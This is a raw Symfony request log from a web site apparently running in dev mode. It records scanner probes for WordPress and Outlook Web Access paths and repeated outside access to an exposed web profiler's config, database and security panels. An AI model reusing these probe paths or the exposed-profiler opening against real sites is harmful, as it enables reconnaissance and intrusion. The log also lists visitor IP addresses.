  6433. [2025-12-20 05:40:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  6434. [2025-12-20 05:42:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6435. [2025-12-20 05:42:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6436. [2025-12-20 05:42:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6437. [2025-12-20 05:42:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6438. [2025-12-20 05:43:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6439. [2025-12-20 05:43:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6440. [2025-12-20 05:43:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6441. [2025-12-20 05:43:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6442. [2025-12-20 05:43:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6443. [2025-12-20 05:43:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6444. [2025-12-20 05:43:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6445. [2025-12-20 05:43:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6446. [2025-12-20 05:43:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6447. [2025-12-20 05:43:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6448. [2025-12-20 05:43:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6449. [2025-12-20 05:43:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6450. [2025-12-20 05:43:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6451. [2025-12-20 05:43:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6452. [2025-12-20 05:43:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6453. [2025-12-20 05:43:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6454. [2025-12-20 05:43:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6455. [2025-12-20 05:44:31] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"14b2f9","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/14b2f9/search/results?ip=146.19.24.116&limit=10","method":"GET"} []
  6456. [2025-12-20 05:44:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10","method":"GET"} []
  6457. [2025-12-20 05:46:34] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  6458. [2025-12-20 05:50:08] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  6459. [2025-12-20 05:50:24] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"fbcff2","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/fbcff2","method":"GET"} []
  6460. [2025-12-20 05:50:32] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  6461. [2025-12-20 05:50:32] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  6462. [2025-12-20 05:50:45] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"7408d6","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/7408d6","method":"GET"} []
  6463. [2025-12-20 05:50:54] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"4990f9","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/4990f9","method":"GET"} []
  6464. [2025-12-20 05:53:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c5960","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c5960?panel=time","method":"GET"} []
  6465. [2025-12-20 05:53:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  6466. [2025-12-20 06:00:37] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"b1be4f","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/b1be4f/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  6467. [2025-12-20 06:00:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  6468. [2025-12-20 06:03:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d40cdc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d40cdc?panel=db","method":"GET"} []
  6469. [2025-12-20 06:03:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  6470. [2025-12-20 06:05:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2?panel=time","method":"GET"} []
  6471. [2025-12-20 06:05:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  6472. [2025-12-20 06:05:16] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  6473. [2025-12-20 06:06:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"96a686","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/96a686","method":"GET"} []
  6474. [2025-12-20 06:06:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6475. [2025-12-20 06:08:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f44717","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/f44717?panel=time","method":"GET"} []
  6476. [2025-12-20 06:08:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  6477. [2025-12-20 06:12:25] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"45c799","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/45c799/search/results?limit=10&method=GET","method":"GET"} []
  6478. [2025-12-20 06:12:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  6479. [2025-12-20 06:13:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"259531","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/259531?panel=config","method":"GET"} []
  6480. [2025-12-20 06:13:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  6481. [2025-12-20 06:13:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=twig","method":"GET"} []
  6482. [2025-12-20 06:13:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  6483. [2025-12-20 06:18:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /owa/auth/logon.aspx"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /owa/auth/logon.aspx\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6484. [2025-12-20 06:18:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48ebd7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48ebd7?group=1&panel=db","method":"GET"} []
  6485. [2025-12-20 06:18:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
  6486. [2025-12-20 06:20:20] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"OPTIONS"} []
  6487. [2025-12-20 06:23:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6488. [2025-12-20 06:23:35] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"408a13","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/408a13/search/results?limit=10&method=GET","method":"GET"} []
  6489. [2025-12-20 06:23:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  6490. [2025-12-20 06:26:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"025fac","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/025fac?panel=twig","method":"GET"} []
  6491. [2025-12-20 06:26:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  6492. [2025-12-20 06:35:52] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6493. [2025-12-20 06:44:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48f71a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48f71a","method":"GET"} []
  6494. [2025-12-20 06:44:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6495. [2025-12-20 06:47:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=34.223.102.8&limit=10&method=GET","method":"GET"} []
  6496. [2025-12-20 06:47:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=34.223.102.8&limit=10&method=GET","method":"GET"} []
  6497. [2025-12-20 06:56:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8","method":"GET"} []
  6498. [2025-12-20 06:56:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6499. [2025-12-20 07:00:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=security","method":"GET"} []
  6500. [2025-12-20 07:00:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  6501. [2025-12-20 07:01:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a7fe89","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a7fe89?panel=events","method":"GET"} []
